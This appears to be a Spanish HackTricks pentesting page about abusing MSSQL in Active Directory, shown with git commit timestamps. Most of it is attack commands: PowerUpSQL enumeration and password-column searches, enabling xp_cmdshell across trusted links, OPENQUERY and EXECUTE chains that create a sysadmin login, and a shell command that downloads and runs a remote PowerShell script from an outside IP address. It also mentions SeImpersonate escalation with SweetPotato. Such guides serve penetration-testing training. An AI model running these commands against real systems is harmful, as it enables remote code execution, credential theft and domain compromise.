hacktricks/windows-hardening/active-directory-methodology/abusing-ad-mssql.md

182 lines
9.9 KiB
Markdown
Raw Normal View History

2023-06-03 01:46:23 +00:00
## **Abuso de MSSQL AD**
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>
2023-06-03 01:46:23 +00:00
## **Enumeración / Descubrimiento de MSSQL**
2023-06-03 01:46:23 +00:00
El módulo de PowerShell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) es muy útil en este caso.
2022-08-15 13:00:19 +00:00
```powershell
Import-Module .\PowerupSQL.psd1
2022-08-15 13:00:19 +00:00
```
2023-06-03 01:46:23 +00:00
### Enumerando desde la red sin sesión de dominio
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP Verbose Threads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
2022-08-15 13:00:19 +00:00
```
2023-06-03 01:46:23 +00:00
### Enumerando desde dentro del dominio
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
2022-08-15 13:00:19 +00:00
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
2023-06-03 01:46:23 +00:00
## Abuso Básico de MSSQL
2022-08-15 13:00:19 +00:00
2023-06-03 01:46:23 +00:00
### Acceder a la Base de Datos
2022-08-15 13:00:19 +00:00
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
2022-08-18 23:47:45 +00:00
# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
2022-08-15 13:00:19 +00:00
```
### MSSQL RCE
2023-06-03 01:46:23 +00:00
También podría ser posible **ejecutar comandos** dentro del host MSSQL.
2022-08-15 13:00:19 +00:00
```powershell
2022-10-08 08:36:40 +00:00
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
2022-08-15 13:00:19 +00:00
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
2023-06-03 01:46:23 +00:00
Revisa en la página mencionada en la **siguiente sección cómo hacer esto manualmente.**
2022-08-15 13:00:19 +00:00
2023-06-03 01:46:23 +00:00
### Trucos básicos de hacking de MSSQL
2022-08-15 13:00:19 +00:00
2022-10-09 17:44:56 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
2022-08-15 13:00:19 +00:00
{% endcontent-ref %}
2023-06-03 01:46:23 +00:00
## Enlaces de confianza de MSSQL
2023-06-03 01:46:23 +00:00
Si una instancia de MSSQL es de confianza (enlace de base de datos) por una instancia de MSSQL diferente. Si el usuario tiene privilegios sobre la base de datos de confianza, también podrá **usar la relación de confianza para ejecutar consultas en la otra instancia**. Estas confianzas pueden ser encadenadas y en algún momento el usuario podría encontrar alguna base de datos mal configurada donde pueda ejecutar comandos.
2022-08-15 13:00:19 +00:00
2023-06-03 01:46:23 +00:00
**Los enlaces entre bases de datos funcionan incluso a través de confianzas de bosques.**
2022-08-15 13:00:19 +00:00
2023-06-03 01:46:23 +00:00
### Abuso de Powershell
2022-08-15 13:00:19 +00:00
```powershell
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
2022-12-20 14:18:39 +00:00
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv Verbose Instance "SQLServer1\Instance1"
2022-08-18 23:47:45 +00:00
#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
2022-09-04 09:37:14 +00:00
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
```
2022-07-28 09:46:19 +00:00
### Metasploit
2023-06-03 01:46:23 +00:00
Puedes comprobar fácilmente los enlaces de confianza utilizando Metasploit.
```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
2023-06-03 01:46:23 +00:00
Ten en cuenta que Metasploit intentará abusar solo de la función `openquery()` en MSSQL (por lo tanto, si no puedes ejecutar comandos con `openquery()`, deberás intentar el método `EXECUTE` **manualmente** para ejecutar comandos, ver más abajo).
2022-07-28 09:46:19 +00:00
### Manual - Openquery()
2023-06-03 01:46:23 +00:00
Desde **Linux** puedes obtener una consola de shell MSSQL con **sqsh** y **mssqlclient.py**.
2023-06-03 01:46:23 +00:00
Desde **Windows** también puedes encontrar los enlaces y ejecutar comandos manualmente usando un **cliente MSSQL como** [**HeidiSQL**](https://www.heidisql.com)
2023-06-03 01:46:23 +00:00
_Inicia sesión usando autenticación de Windows:_
2022-07-28 09:46:19 +00:00
![](<../../.gitbook/assets/image (167) (1).png>)
2023-06-03 01:46:23 +00:00
#### Encontrar enlaces confiables
2022-08-15 13:00:19 +00:00
```sql
select * from master..sysservers
```
2023-06-03 01:46:23 +00:00
#### Ejecutar consultas en enlaces confiables
2023-06-03 01:46:23 +00:00
Ejecute consultas a través del enlace confiable (por ejemplo: encuentre más enlaces en la nueva instancia accesible):
2022-08-15 13:00:19 +00:00
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
2023-06-03 01:46:23 +00:00
Revisa dónde se usan comillas dobles y simples, es importante usarlas de esa manera.
2022-08-15 13:00:19 +00:00
{% endhint %}
![](<../../.gitbook/assets/image (169).png>)
2023-06-03 01:46:23 +00:00
Puedes continuar esta cadena de enlaces de confianza para siempre de forma manual.
2022-08-15 13:00:19 +00:00
```sql
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
2023-06-03 01:46:23 +00:00
Si no puedes realizar acciones como `exec xp_cmdshell` desde `openquery()`, intenta con el método `EXECUTE`.
2022-07-28 09:46:19 +00:00
### Manual - EXECUTE
2023-06-03 01:46:23 +00:00
También puedes abusar de los enlaces de confianza utilizando `EXECUTE`:
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
2023-06-03 01:46:23 +00:00
## Escalada de privilegios local
2023-06-03 01:46:23 +00:00
El usuario local de **MSSQL** suele tener un tipo especial de privilegio llamado **`SeImpersonatePrivilege`**. Esto permite que la cuenta "suplante a un cliente después de la autenticación".
2022-08-15 13:00:19 +00:00
2023-06-03 01:46:23 +00:00
Una estrategia que muchos autores han ideado es forzar a un servicio **SYSTEM** a autenticarse en un servicio malicioso o de intermediario que el atacante crea. Este servicio malicioso puede suplantar al servicio **SYSTEM** mientras intenta autenticarse.
2022-08-15 13:00:19 +00:00
2023-06-03 01:46:23 +00:00
[SweetPotato](https://github.com/CCob/SweetPotato) tiene una colección de estas diversas técnicas que se pueden ejecutar a través del comando `execute-assembly` de Beacon.